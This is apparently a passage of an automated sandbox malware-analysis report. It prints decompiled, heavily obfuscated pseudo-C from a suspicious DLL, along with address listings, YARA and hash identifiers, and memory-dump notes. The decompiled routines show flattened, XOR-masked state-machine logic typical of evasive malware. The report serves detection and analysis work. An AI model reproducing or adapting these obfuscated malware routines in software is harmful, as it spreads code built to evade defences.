				_v116 = _v116 ^ 0x0028ab23;
				_v24 = 0xe1b7;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0x0386d299;
				_v100 = 0x8399;
				_v100 = _v100 ^ 0xb4057ac8;
				_v100 = _v100 ^ 0x810196d4;
				_v100 = _v100 ^ 0x3504142b;
				goto L1;
				do {
					while(1) {
						L1:
						_t376 = _t366 - 0x1f0dfb0b;
						if(_t376 > 0) {
							break;
						}
						if(_t376 == 0) {
							_t320 = E10007544(_v44, _v140, _v144, _t338 + 0x18, _v104);
							_t368 =  &(_t368[3]);
							_t366 = 0x177163fa;
							_t365 = _t365 + _t320;
							continue;
						} else {
							if(_t366 == 0x5c5105d) {
								_t365 = _t365 + E10007E30();
							} else {
								if(_t366 == 0xe774bfd) {
									_t330 = E10007E30();
									_t368 = _t368 - 0xc + 0xc;
									_t366 = 0x24a30213;
									_t365 = _t365 + _t330;
									continue;
								} else {
									if(_t366 == 0x1438015d) {
										_t335 = E10007E30();
										_t368 = _t368 - 0xc + 0xc;
										_t366 = 0x1f0dfb0b;
										_t365 = _t365 + _t335;
										continue;
									} else {
										if(_t366 != 0x177163fa) {
											goto L19;
										} else {
											_t337 = E10007544(_v96, _v20, _v112, _t338 + 0x20, _v56);
											_t368 =  &(_t368[3]);
											_t366 = 0x5c5105d;
											_t365 = _t365 + _t337;
											continue;
										}
									}
								}
							}
						}
						L22:
						return _t365;
					}
					if(_t366 == 0x21c96020) {
						_t312 = E10007E30();
						_t368 = _t368 - 0xc + 0xc;
						_t366 = 0xe774bfd;
						_t365 = _t365 + _t312;
						goto L19;
					} else {
						if(_t366 == 0x24a30213) {
							_t317 = E10007E30();
							_t368 = _t368 - 0xc + 0xc;
							_t366 = 0x1438015d;
							_t365 = _t365 + _t317;
							goto L1;
						} else {
							if(_t366 == 0x25585055) {
								_t318 = E10007544(_v132, _v28, _v84, _t338, _v92);
								_t368 =  &(_t368[3]);
								_t366 = 0x21c96020;
								_t365 = _t365 + _t318;
								goto L1;
							} else {
								if(_t366 != 0x358f7696) {
									goto L19;
								} else {
									_t366 = 0x25585055;
									goto L1;
								}
							}
						}
					}
					goto L22;
					L19:
				} while (_t366 != 0xd1eac77);
				goto L22;
			}

























































                                                                        0x10015daa
                                                                        0x10015db0
                                                                        0x10015dbd
                                                                        0x10015dce
                                                                        0x10015dd0
                                                                        0x10015dd2
                                                                        0x10015dd9
                                                                        0x10015dde
                                                                        0x10015de5
                                                                        0x10015df1
                                                                        0x10015df6
                                                                        0x10015e00
                                                                        0x10015e05
                                                                        0x10015e0b
                                                                        0x10015e13
                                                                        0x10015e1b
                                                                        0x10015e26
                                                                        0x10015e31
                                                                        0x10015e3c
                                                                        0x10015e44
                                                                        0x10015e4c
                                                                        0x10015e54
                                                                        0x10015e5c
                                                                        0x10015e69
                                                                        0x10015e6c
                                                                        0x10015e70
                                                                        0x10015e78
                                                                        0x10015e80
                                                                        0x10015e8b
                                                                        0x10015e93
                                                                        0x10015e9e
                                                                        0x10015ea6
                                                                        0x10015eb3
                                                                        0x10015eb7
                                                                        0x10015ebc
                                                                        0x10015ec4
                                                                        0x10015ed0
                                                                        0x10015ed3
                                                                        0x10015edc
                                                                        0x10015ee0
                                                                        0x10015ee8
                                                                        0x10015ef0
                                                                        0x10015ef5
                                                                        0x10015efd
                                                                        0x10015f05
                                                                        0x10015f0d
                                                                        0x10015f15
                                                                        0x10015f1d
                                                                        0x10015f25
                                                                        0x10015f2d
                                                                        0x10015f35
                                                                        0x10015f3d
                                                                        0x10015f45
                                                                        0x10015f4d
                                                                        0x10015f5a
                                                                        0x10015f63
                                                                        0x10015f67
                                                                        0x10015f6f
                                                                        0x10015f77
                                                                        0x10015f81
                                                                        0x10015f89
                                                                        0x10015f91
                                                                        0x10015fa0
                                                                        0x10015fa3
                                                                        0x10015fa7
                                                                        0x10015faf
                                                                        0x10015fb7
                                                                        0x10015fbf
                                                                        0x10015fc7
                                                                        0x10015fcf
                                                                        0x10015fd3
                                                                        0x10015fdb
                                                                        0x10015fee
                                                                        0x10015ff5
                                                                        0x10016000
                                                                        0x10016008
                                                                        0x10016010
                                                                        0x10016015
                                                                        0x1001601a
                                                                        0x10016022
                                                                        0x1001602f
                                                                        0x10016033
                                                                        0x10016038
                                                                        0x10016040
                                                                        0x10016048
                                                                        0x10016058
                                                                        0x1001605c
                                                                        0x10016064
                                                                        0x1001606c
                                                                        0x10016074
                                                                        0x10016080
                                                                        0x10016083
                                                                        0x10016087
                                                                        0x1001608f
                                                                        0x10016097
                                                                        0x1001609f
                                                                        0x100160a7
                                                                        0x100160af
                                                                        0x100160b7
                                                                        0x100160bf
                                                                        0x100160c3
                                                                        0x100160cb
                                                                        0x100160d3
                                                                        0x100160db
                                                                        0x100160e0
                                                                        0x100160e8
                                                                        0x100160f0
                                                                        0x100160f8
                                                                        0x10016100
                                                                        0x10016108
                                                                        0x10016110
                                                                        0x10016118
                                                                        0x10016122
                                                                        0x10016126
                                                                        0x1001612e
                                                                        0x10016139
                                                                        0x10016141
                                                                        0x1001614c
                                                                        0x10016154
                                                                        0x1001615c
                                                                        0x10016166
                                                                        0x1001616a
                                                                        0x10016172
                                                                        0x1001617a
                                                                        0x1001617f
                                                                        0x10016187
                                                                        0x1001618f
                                                                        0x10016199
                                                                        0x100161a1
                                                                        0x100161a6
                                                                        0x100161ae
                                                                        0x100161b6
                                                                        0x100161be
                                                                        0x100161c3
                                                                        0x100161c8
                                                                        0x100161d0
                                                                        0x100161db
                                                                        0x100161e3
                                                                        0x100161ee
                                                                        0x100161f6
                                                                        0x100161fe
                                                                        0x10016206
                                                                        0x10016206
                                                                        0x1001620e
                                                                        0x1001620e
                                                                        0x1001620e
                                                                        0x1001620e
                                                                        0x10016210
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016216
                                                                        0x100162cb
                                                                        0x100162d0
                                                                        0x100162d3
                                                                        0x100162d8
                                                                        0x00000000
                                                                        0x1001621c
                                                                        0x10016222
                                                                        0x100163b0
                                                                        0x10016228
                                                                        0x1001622e
                                                                        0x100162a0
                                                                        0x100162a5
                                                                        0x100162a8
                                                                        0x100162ad
                                                                        0x00000000
                                                                        0x10016230
                                                                        0x10016236
                                                                        0x1001627f
                                                                        0x10016284
                                                                        0x10016287
                                                                        0x10016289
                                                                        0x00000000
                                                                        0x10016238
                                                                        0x1001623e
                                                                        0x00000000
                                                                        0x10016244
                                                                        0x1001625b
                                                                        0x10016260
                                                                        0x10016263
                                                                        0x10016268
                                                                        0x00000000
                                                                        0x10016268
                                                                        0x1001623e
                                                                        0x10016236
                                                                        0x1001622e
                                                                        0x10016222
                                                                        0x100163b2
                                                                        0x100163be
                                                                        0x100163be
                                                                        0x100162e5
                                                                        0x10016375
                                                                        0x1001637a
                                                                        0x1001637d
                                                                        0x10016382
                                                                        0x00000000
                                                                        0x100162e7
                                                                        0x100162ed
                                                                        0x1001634b
                                                                        0x10016350
                                                                        0x10016353
                                                                        0x10016358
                                                                        0x00000000
                                                                        0x100162ef
                                                                        0x100162f5
                                                                        0x10016321
                                                                        0x10016326
                                                                        0x10016329
                                                                        0x1001632e
                                                                        0x00000000
                                                                        0x100162f7
                                                                        0x100162fd
                                                                        0x00000000
                                                                        0x10016303
                                                                        0x10016303
                                                                        0x00000000
                                                                        0x10016303
                                                                        0x100162fd
                                                                        0x100162f5
                                                                        0x100162ed
                                                                        0x00000000
                                                                        0x10016384
                                                                        0x10016384
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: C6$Cu$UPX%$UPX%$Y,$Yb^q$^R$w$|<$E
                                                                        • API String ID: 0-937103397
                                                                        • Opcode ID: 867b8cbbaa225e8eb667e3060bb1b8e4f354686b956b7512de0d7884d6bc3c21
                                                                        • Instruction ID: e91972674f3eb71ba7037216d4b2c91072d805a8743603f57f5014319008b3a2
                                                                        • Opcode Fuzzy Hash: 867b8cbbaa225e8eb667e3060bb1b8e4f354686b956b7512de0d7884d6bc3c21
                                                                        • Instruction Fuzzy Hash: 93E102718083818FD3A4CF64D88954BFBF1BBC4748F108A1DF5EA9A260D7B59949CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100137F4, Relevance: 11.5, Strings: 9, Instructions: 244COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E100137F4() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				void* _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				void* _t242;
				signed int _t247;
				void* _t249;
				void* _t250;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t278;
				signed int _t281;
				void* _t282;
				void* _t287;
				signed int* _t289;
				void* _t297;

				_t289 =  &_v684;
				_v580 = 0x2c23da;
				asm("stosd");
				_t250 = 0;
				_t252 = 0x3c;
				asm("stosd");
				_t282 = 0x19809088;
				asm("stosd");
				_v640 = 0xf0d1;
				_v640 = _v640 << 2;
				_v640 = _v640 | 0x5b158a51;
				_v640 = _v640 ^ 0x5b17cbd5;
				_v596 = 0xd18a;
				_v596 = _v596 * 0x68;
				_v596 = _v596 ^ 0x00552011;
				_v624 = 0x272d;
				_v624 = _v624 / _t252;
				_v624 = _v624 ^ 0x00001784;
				_v644 = 0xc09;
				_v644 = _v644 << 8;
				_v644 = _v644 | 0xf1f4736a;
				_v644 = _v644 ^ 0xf1fc5cf6;
				_v616 = 0xc6c6;
				_v616 = _v616 + 0xffff298f;
				_v616 = _v616 ^ 0xffff9aa4;
				_v664 = 0x880f;
				_v664 = _v664 >> 0xd;
				_v664 = _v664 + 0xfac7;
				_v664 = _v664 ^ 0x0000c275;
				_v632 = 0x6cb7;
				_v632 = _v632 + 0x71ae;
				_v632 = _v632 ^ 0xf12e281f;
				_v632 = _v632 ^ 0xf12e892c;
				_v648 = 0x35dc;
				_t253 = 0x11;
				_v648 = _v648 / _t253;
				_v648 = _v648 ^ 0x6afc1010;
				_v648 = _v648 ^ 0x6afc6648;
				_v592 = 0xf9c9;
				_v592 = _v592 + 0xdff3;
				_v592 = _v592 ^ 0x0001b583;
				_v680 = 0x7b8d;
				_t254 = 3;
				_v680 = _v680 * 0x34;
				_v680 = _v680 >> 0x10;
				_v680 = _v680 << 0xe;
				_v680 = _v680 ^ 0x00063d51;
				_v604 = 0xd1fb;
				_v604 = _v604 / _t254;
				_v604 = _v604 ^ 0x000016e7;
				_v600 = 0x6d4a;
				_v600 = _v600 | 0xe95b5ca0;
				_v600 = _v600 ^ 0xe95b5d58;
				_v656 = 0xa6d5;
				_v656 = _v656 * 0x2c;
				_v656 = _v656 ^ 0x2fdaf6b8;
				_v656 = _v656 ^ 0x2fc61d34;
				_v636 = 0x2da6;
				_t255 = 0x61;
				_v636 = _v636 / _t255;
				_v636 = _v636 << 0xf;
				_v636 = _v636 ^ 0x003c31b2;
				_v620 = 0x6f0c;
				_v620 = _v620 + 0x94cb;
				_v620 = _v620 ^ 0x00015a96;
				_v608 = 0x32b0;
				_v608 = _v608 + 0x3f32;
				_v608 = _v608 ^ 0x00007dd4;
				_v684 = 0x29d;
				_v684 = _v684 + 0xad7f;
				_v684 = _v684 | 0x819b4d84;
				_t256 = 0x72;
				_v684 = _v684 / _t256;
				_v684 = _v684 ^ 0x012311d1;
				_v660 = 0x64d5;
				_v660 = _v660 | 0xb65d9e9f;
				_v660 = _v660 + 0xffff3959;
				_v660 = _v660 ^ 0xb65d035f;
				_v612 = 0x140;
				_v612 = _v612 >> 0xf;
				_v612 = _v612 ^ 0x00002c68;
				_v676 = 0xfbaa;
				_v676 = _v676 >> 8;
				_v676 = _v676 + 0x1669;
				_v676 = _v676 ^ 0x03abbef6;
				_v676 = _v676 ^ 0x03ab9f96;
				_v628 = 0xebed;
				_v628 = _v628 + 0x7cae;
				_t257 = 0x47;
				_t281 = _v624;
				_v628 = _v628 * 0x47;
				_v628 = _v628 ^ 0x006452eb;
				_v672 = 0xe594;
				_v672 = _v672 >> 0xc;
				_v672 = _v672 / _t257;
				_v672 = _v672 | 0x6c4d1fae;
				_v672 = _v672 ^ 0x6c4d687d;
				_v668 = 0x6152;
				_v668 = _v668 >> 0xa;
				_v668 = _v668 | 0x4751a645;
				_v668 = _v668 ^ 0x4751bfac;
				_v652 = 0x7c78;
				_t258 = 0x4c;
				_v652 = _v652 / _t258;
				_v652 = _v652 ^ 0x3b31093c;
				_v652 = _v652 ^ 0x3b31089c;
				do {
					while(_t282 != 0xc4cab9f) {
						if(_t282 == 0x1828ae29) {
							_t242 = E10008C0C(_v624, __eflags, _v644, _v616,  &_v524);
							_t289 =  &(_t289[3]);
							__eflags = _t242;
							if(__eflags == 0) {
								L11:
								return _t250;
							}
							_t282 = 0x19f95bd8;
							continue;
						}
						if(_t282 == 0x19809088) {
							_t282 = 0x1828ae29;
							continue;
						}
						if(_t282 == 0x19f95bd8) {
							_t278 = _v596;
							_t281 = E1000492A(_v652, _t278, _v664, _v632, _v648, _v652, _v640, _v592, _v652,  &_v524, _t250, _v680, _v604, _v600);
							_t289 =  &(_t289[0xc]);
							__eflags = _t281 - 0xffffffff;
							if(__eflags == 0) {
								goto L11;
							}
							_t282 = 0x27d5d232;
							continue;
						}
						if(_t282 == 0x27d5d232) {
							_t247 = E100153AE(_v656, _v636, _v620, _t258, _t281, _v608,  &_v564);
							_t258 = _t281;
							_t278 = _v684;
							asm("sbb esi, esi");
							_t282 = ( ~_t247 & 0xfed365d9) + 0xd7945c6;
							E100078F0(_t281, _t278, _v660, _v612, _v676);
							_t289 =  &(_t289[9]);
							goto L19;
						}
						if(_t282 != 0x32ff9f3c) {
							goto L19;
						}
						_t249 = E100023BC();
						_t287 = _v588 - _v548;
						asm("sbb ecx, [esp+0x9c]");
						_t297 = _v584 - _t278;
						if(_t297 >= 0 && (_t297 > 0 || _t287 >= _t249)) {
							_t250 = 1;
						}
						goto L11;
					}
					E10012092(_v628,  &_v588, _v672, _v668);
					_pop(_t258);
					_t282 = 0x32ff9f3c;
					L19:
					__eflags = _t282 - 0xd7945c6;
				} while (__eflags != 0);
				goto L11;
			}


















































                                                                        0x100137f4
                                                                        0x100137fa
                                                                        0x1001380e
                                                                        0x1001380f
                                                                        0x10013813
                                                                        0x10013816
                                                                        0x10013817
                                                                        0x1001381c
                                                                        0x1001381d
                                                                        0x10013825
                                                                        0x1001382a
                                                                        0x10013832
                                                                        0x1001383a
                                                                        0x10013847
                                                                        0x1001384b
                                                                        0x10013853
                                                                        0x10013863
                                                                        0x10013867
                                                                        0x1001386f
                                                                        0x10013877
                                                                        0x1001387c
                                                                        0x10013884
                                                                        0x1001388c
                                                                        0x10013894
                                                                        0x1001389c
                                                                        0x100138a4
                                                                        0x100138ac
                                                                        0x100138b1
                                                                        0x100138b9
                                                                        0x100138c1
                                                                        0x100138c9
                                                                        0x100138d1
                                                                        0x100138d9
                                                                        0x100138e1
                                                                        0x100138ed
                                                                        0x100138f2
                                                                        0x100138f8
                                                                        0x10013900
                                                                        0x10013908
                                                                        0x10013910
                                                                        0x10013918
                                                                        0x10013920
                                                                        0x1001392d
                                                                        0x10013930
                                                                        0x10013934
                                                                        0x10013939
                                                                        0x1001393e
                                                                        0x10013946
                                                                        0x10013954
                                                                        0x10013958
                                                                        0x10013960
                                                                        0x10013968
                                                                        0x10013970
                                                                        0x10013978
                                                                        0x10013985
                                                                        0x10013989
                                                                        0x10013991
                                                                        0x1001399b
                                                                        0x100139a7
                                                                        0x100139ac
                                                                        0x100139b2
                                                                        0x100139bc
                                                                        0x100139c4
                                                                        0x100139cc
                                                                        0x100139d4
                                                                        0x100139dc
                                                                        0x100139e4
                                                                        0x100139ec
                                                                        0x100139f4
                                                                        0x100139fc
                                                                        0x10013a04
                                                                        0x10013a10
                                                                        0x10013a15
                                                                        0x10013a1b
                                                                        0x10013a23
                                                                        0x10013a2b
                                                                        0x10013a33
                                                                        0x10013a3b
                                                                        0x10013a43
                                                                        0x10013a4b
                                                                        0x10013a50
                                                                        0x10013a58
                                                                        0x10013a60
                                                                        0x10013a65
                                                                        0x10013a6d
                                                                        0x10013a75
                                                                        0x10013a7d
                                                                        0x10013a85
                                                                        0x10013a92
                                                                        0x10013a95
                                                                        0x10013a99
                                                                        0x10013a9d
                                                                        0x10013aa5
                                                                        0x10013aad
                                                                        0x10013aba
                                                                        0x10013abe
                                                                        0x10013ac6
                                                                        0x10013ace
                                                                        0x10013ad6
                                                                        0x10013adb
                                                                        0x10013ae3
                                                                        0x10013aeb
                                                                        0x10013af7
                                                                        0x10013afa
                                                                        0x10013afe
                                                                        0x10013b06
                                                                        0x10013b0e
                                                                        0x10013b0e
                                                                        0x10013b1c
                                                                        0x10013c44
                                                                        0x10013c49
                                                                        0x10013c4c
                                                                        0x10013c4e
                                                                        0x10013b79
                                                                        0x10013b82
                                                                        0x10013b82
                                                                        0x10013c54
                                                                        0x00000000
                                                                        0x10013c54
                                                                        0x10013b28
                                                                        0x10013c29
                                                                        0x00000000
                                                                        0x10013c29
                                                                        0x10013b34
                                                                        0x10013c01
                                                                        0x10013c11
                                                                        0x10013c13
                                                                        0x10013c16
                                                                        0x10013c19
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10013c1f
                                                                        0x00000000
                                                                        0x10013c1f
                                                                        0x10013b40
                                                                        0x10013b9d
                                                                        0x10013ba8
                                                                        0x10013bb4
                                                                        0x10013bb8
                                                                        0x10013bc0
                                                                        0x10013bc6
                                                                        0x10013bcb
                                                                        0x00000000
                                                                        0x10013bcb
                                                                        0x10013b48
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10013b4e
                                                                        0x10013b57
                                                                        0x10013b62
                                                                        0x10013b69
                                                                        0x10013b6b
                                                                        0x10013b75
                                                                        0x10013b75
                                                                        0x00000000
                                                                        0x10013b6b
                                                                        0x10013c6e
                                                                        0x10013c74
                                                                        0x10013c75
                                                                        0x10013c7a
                                                                        0x10013c7a
                                                                        0x10013c7a
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -'$2?$<1;$Ra$X][$h,$x|$}hMl$Rd
                                                                        • API String ID: 0-2401909234
                                                                        • Opcode ID: 91d6f69f52cec33eb150c8f23eacba65fbe3d1b3256e5b72d9c82c4956ed300c
                                                                        • Instruction ID: 5388816bb5d1eecf1ba6e6649f08daf6316018bad176c26ee88db10dcf1e4ca8
                                                                        • Opcode Fuzzy Hash: 91d6f69f52cec33eb150c8f23eacba65fbe3d1b3256e5b72d9c82c4956ed300c
                                                                        • Instruction Fuzzy Hash: 61B110725083809FE358CF65C48A94BBBE2FBC4358F108A1DF5959A2A0D7B5D948CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10015115, Relevance: 11.4, Strings: 9, Instructions: 139COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10015115() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t117;
				signed int _t120;
				signed int _t122;
				signed int _t125;
				void* _t126;
				signed int _t138;
				signed int _t139;
				intOrPtr _t141;
				signed int _t143;
				signed int* _t144;

				_t144 =  &_v568;
				_v528 = 0x5aebe;
				_t141 = 0;
				_t126 = 0xdd78c1f;
				_v524 = 0;
				_v568 = 0xe0a6;
				_v568 = _v568 + 0xefcc;
				_v568 = _v568 >> 3;
				_v568 = _v568 + 0xffffba73;
				_v568 = _v568 ^ 0xfffff0ad;
				_v564 = 0x6b83;
				_t138 = 0x25;
				_v564 = _v564 / _t138;
				_v564 = _v564 << 2;
				_v564 = _v564 >> 2;
				_v564 = _v564 ^ 0x0000048b;
				_v556 = 0xe5d8;
				_t139 = 0x1f;
				_v556 = _v556 * 0x31;
				_v556 = _v556 ^ 0x577859bf;
				_v556 = _v556 / _t139;
				_v556 = _v556 ^ 0x02d16e7d;
				_v552 = 0x540d;
				_v552 = _v552 * 0x44;
				_v552 = _v552 * 0x6c;
				_v552 = _v552 + 0xffff4b52;
				_v552 = _v552 ^ 0x096ab6e1;
				_v548 = 0x2240;
				_v548 = _v548 | 0x13356285;
				_v548 = _v548 ^ 0x133520ec;
				_v560 = 0x478b;
				_v560 = _v560 >> 4;
				_v560 = _v560 + 0x6d64;
				_v560 = _v560 + 0xffffa9cd;
				_v560 = _v560 ^ 0x00004ab1;
				_v532 = 0x9667;
				_v532 = _v532 << 4;
				_v532 = _v532 ^ 0x00090457;
				_t140 = _v548;
				_t143 = _v548;
				_t125 = _v548;
				_v540 = 0x3ff9;
				_v540 = _v540 * 0x59;
				_v540 = _v540 | 0xbbcf382b;
				_v540 = _v540 ^ 0xbbdf4460;
				_v536 = 0x71ad;
				_v536 = _v536 ^ 0xa8de0853;
				_v536 = _v536 ^ 0xa8de4efe;
				_v544 = 0x526a;
				_v544 = _v544 | 0x2fe28bf9;
				_v544 = _v544 ^ 0x2fe2ff10;
				do {
					while(_t126 != 0xdd78c1f) {
						if(_t126 == 0x116c8390) {
							_t117 = E1000929E();
							_t140 = _t117;
							__eflags = _t117;
							if(__eflags == 0) {
								L9:
								return _t141;
							}
							_t126 = 0x1a95d21f;
							continue;
						}
						if(_t126 == 0x1326aa4f) {
							_t120 = E10001E13(_v548, _v560, _v532, _v540,  &_v520);
							_t144 =  &(_t144[3]);
							_t143 = _t120;
							_t126 = 0x217dee79;
							continue;
						}
						if(_t126 == 0x1a95d21f) {
							_t122 = E1000D44C(_t140, _v564, __eflags, _t126,  &_v520, _v556, _v552);
							_t144 =  &(_t144[4]);
							__eflags = _t122;
							if(__eflags == 0) {
								goto L9;
							}
							_t126 = 0x1326aa4f;
							continue;
						}
						if(_t126 == 0x217dee79) {
							_t125 = E1001C424(_t143, _v544);
							_t126 = 0x3152545d;
							continue;
						}
						if(_t126 != 0x3152545d) {
							goto L17;
						}
						_v568 = 0x3661;
						_v568 = _v568 << 0xe;
						_v568 = _v568 * 5;
						_v568 = _v568 + 0xbb88;
						_v568 = _v568 ^ 0x69defb6a;
						if(_t125 == _v568) {
							_t141 = 1;
						}
						goto L9;
					}
					_t126 = 0x116c8390;
					L17:
					__eflags = _t126 - 0x64d23cb;
				} while (__eflags != 0);
				goto L9;
			}


























                                                                        0x10015115
                                                                        0x1001511b
                                                                        0x10015128
                                                                        0x1001512a
                                                                        0x1001512f
                                                                        0x10015133
                                                                        0x1001513b
                                                                        0x10015143
                                                                        0x10015148
                                                                        0x10015150
                                                                        0x10015158
                                                                        0x10015167
                                                                        0x1001516c
                                                                        0x10015172
                                                                        0x10015177
                                                                        0x1001517c
                                                                        0x10015184
                                                                        0x10015191
                                                                        0x10015192
                                                                        0x10015196
                                                                        0x100151a4
                                                                        0x100151a8
                                                                        0x100151b0
                                                                        0x100151bd
                                                                        0x100151c6
                                                                        0x100151ca
                                                                        0x100151d2
                                                                        0x100151da
                                                                        0x100151e2
                                                                        0x100151ea
                                                                        0x100151f2
                                                                        0x100151fa
                                                                        0x100151ff
                                                                        0x10015207
                                                                        0x1001520f
                                                                        0x10015217
                                                                        0x1001521f
                                                                        0x10015224
                                                                        0x1001522c
                                                                        0x10015230
                                                                        0x10015234
                                                                        0x10015238
                                                                        0x10015245
                                                                        0x10015249
                                                                        0x10015251
                                                                        0x10015259
                                                                        0x10015261
                                                                        0x10015269
                                                                        0x10015271
                                                                        0x10015279
                                                                        0x10015281
                                                                        0x10015289
                                                                        0x10015289
                                                                        0x1001529b
                                                                        0x10015378
                                                                        0x1001537d
                                                                        0x1001537f
                                                                        0x10015381
                                                                        0x100152f9
                                                                        0x10015304
                                                                        0x10015304
                                                                        0x10015387
                                                                        0x00000000
                                                                        0x10015387
                                                                        0x100152a7
                                                                        0x10015360
                                                                        0x10015365
                                                                        0x10015368
                                                                        0x1001536a
                                                                        0x00000000
                                                                        0x1001536a
                                                                        0x100152b3
                                                                        0x10015335
                                                                        0x1001533a
                                                                        0x1001533d
                                                                        0x1001533f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10015341
                                                                        0x00000000
                                                                        0x10015341
                                                                        0x100152bb
                                                                        0x10015315
                                                                        0x10015317
                                                                        0x00000000
                                                                        0x10015317
                                                                        0x100152c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100152c9
                                                                        0x100152d1
                                                                        0x100152db
                                                                        0x100152df
                                                                        0x100152e7
                                                                        0x100152f3
                                                                        0x100152f7
                                                                        0x100152f7
                                                                        0x00000000
                                                                        0x100152f3
                                                                        0x10015391
                                                                        0x10015396
                                                                        0x10015396
                                                                        0x10015396
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: T$@"$]TR1$]TR1$a6$dm$jR$y}!$y}!
                                                                        • API String ID: 0-2886613653
                                                                        • Opcode ID: 9f8fb6bfe239287454dccb0f102526f4b7d4ba8770cf1b58457d1acbfbff7d93
                                                                        • Instruction ID: 092e755a5dcb822a0ee83699db47e88b3ee05a0ce695016b2a566ce4ce8947d0
                                                                        • Opcode Fuzzy Hash: 9f8fb6bfe239287454dccb0f102526f4b7d4ba8770cf1b58457d1acbfbff7d93
                                                                        • Instruction Fuzzy Hash: 51514571508341DFD384CF65C48541FBBE1FBC8798F144A1EF5A69A260D3B9CA898F86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1000620A, Relevance: 10.4, Strings: 8, Instructions: 375COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E1000620A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v128;
				signed int _v132;
				intOrPtr _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* _t338;
				intOrPtr _t364;
				void* _t377;
				signed int _t380;
				intOrPtr _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				intOrPtr _t395;
				void* _t422;
				intOrPtr* _t430;
				signed int _t433;
				intOrPtr _t438;
				signed int* _t440;
				void* _t443;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t338);
				_v80 = 0xcc9d;
				_t440 =  &(( &_v168)[6]);
				_t386 = 0;
				_t433 = 0x16bff9b6;
				_t438 = 0;
				_t388 = 0x11;
				_v80 = _v80 / _t388;
				_v80 = _v80 + 0xffff11cc;
				_v80 = _v80 ^ 0xffff7c6a;
				_v44 = 0x1a06;
				_v44 = _v44 << 1;
				_v44 = _v44 ^ 0x00002b89;
				_v160 = 0x27c9;
				_v160 = _v160 >> 9;
				_v160 = _v160 << 7;
				_v160 = _v160 << 7;
				_v160 = _v160 ^ 0x0004f334;
				_v168 = 0x8961;
				_v168 = _v168 + 0x1e8b;
				_v168 = _v168 << 0x10;
				_v168 = _v168 ^ 0xca952250;
				_v168 = _v168 ^ 0x6d795972;
				_v40 = 0xb8c6;
				_t389 = 0x25;
